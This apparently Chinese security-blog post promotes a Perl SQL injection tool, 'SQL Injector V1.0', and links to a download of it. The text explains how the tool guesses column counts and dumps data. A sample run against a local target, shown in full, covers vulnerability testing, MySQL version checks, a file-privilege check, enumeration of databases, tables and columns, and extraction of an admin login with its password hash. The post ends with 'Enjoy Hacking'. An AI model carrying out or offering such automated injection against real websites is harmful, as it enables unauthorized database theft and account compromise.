0x50sec.org

order by的验证采用折半方式猜解,可以自由选择dump的数据库,默认是当前数据库。
dump数据库的时候用的是group_concat()一次get就搞定,因为有时候table比较多为了能全部显示，所以dump table_name的时候用的是limit x,1，一次get()只能读出一条记录，鱼与熊掌不可兼得啊。基本上人工是怎么注射的，这个小程序就是怎么注射的。
简单测试结果如下:

alone@alone-desktop:~/perl$ ./sql51.pl ‘http://127.1/vnews.php?print=1&id=2′ ‘good’

|=—————————————–=|
|=———[ SQL Injector V1.0 ]———–=|
|=———–[ By hackerxwar ]————-=|
|=—————————————–=|

[*] Test and 1=1
[*] Test and 1=2

[+] Vulnerable!!!

[*] Test Mysql Version = 4.x

[-] Mysql Version Is Not 4.x

[*] Test Mysql Version = 5.x

[+] Mysql Version is 5.x

[*] Test Order By Query…

[*] Test order by 25–
[*] Test order by 13–
[*] Test order by 7–
[*] Test order by 4–
[*] Test order by 5–
[*] Test order by 6–

[+] Found Order By 6
[*] Getting Basic Info…

[+] Data User: root@localhost
[+] Database : sqlin

[*] Check file_priv…

[+] file_priv :Y

[*] mysql5 will dump dbs…
[*] Dumping databases …

[+] Dump dbs :
information_schema
mysql
sqlin

Enter the database to dump:
Default is The current database [sqlin]

[*] Dumping table_name from database [sqlin]…
Ext_JCCHP_Company
Ext_JCCMS_Attachments
Ext_JCCMS_Category
Ext_JCCMS_Item
Ext_JCRack_Product
Ext_JCStaticPage
Ext_JCUser
Ext_JCUser_Purview
Ext_JCUser_PurviewLink
Ext_JCVisitorsBook_Words
W3B_ServiceDonames
W3B_Services
admin
uni_addons
uni_articles
uni_comments
uni_custom_pages
uni_files
uni_files_ctg
uni_gallery
uni_gallery_ctg
uni_menu
uni_menu_ctg
uni_news
uni_patterns
uni_patterns_ctg
uni_rmenu
uni_settings
uni_styles
uni_users
Enter the table to dump: uni_users
[*] Dumping column_name from table [sqlin.uni_users]…

[+] Dump column_name from table [uni_users]:
id
login
email
password
access

[*] Dump the conten from table [uni_users]…
Enter the username field: login
Enter the password field: password

[+] Dump [login]:[password] from table [uni_users]:
admin:21232f297a57a5a743894a0e4a801fc3

[+] Done…

[+] Enjoy Hacking…

下载地址:xmysql-v1.pl.tar